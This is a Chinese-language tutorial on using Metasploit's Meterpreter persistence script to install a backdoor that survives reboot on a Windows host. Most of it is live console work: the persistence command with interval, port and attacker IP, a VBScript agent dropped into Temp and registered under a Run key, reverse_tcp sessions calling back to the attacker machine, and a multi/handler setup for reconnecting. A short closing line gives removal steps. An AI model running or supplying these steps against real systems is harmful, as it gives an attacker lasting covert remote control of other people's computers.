Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。
如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使用端口为 6666(-p 6666),连接的目的IP为 192.168.71.105 。然后用 use multi/handler 命令进行监听,在设置了一大堆参数之后执行 exploit 命令,可以看到和预期的一样建立了连接。
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter >
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.71.112 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 WUST-3E75F1D708\Administrator @ WUST-3E75F1D708 192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
自动化的脚本在C:\Documents and Settings\Administrator\Local Settings\Temp\下
自动化以后下次可以直接在msf下打开会话:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
注意到移除 Meterpreter 代理的办法是删除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注册表键和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。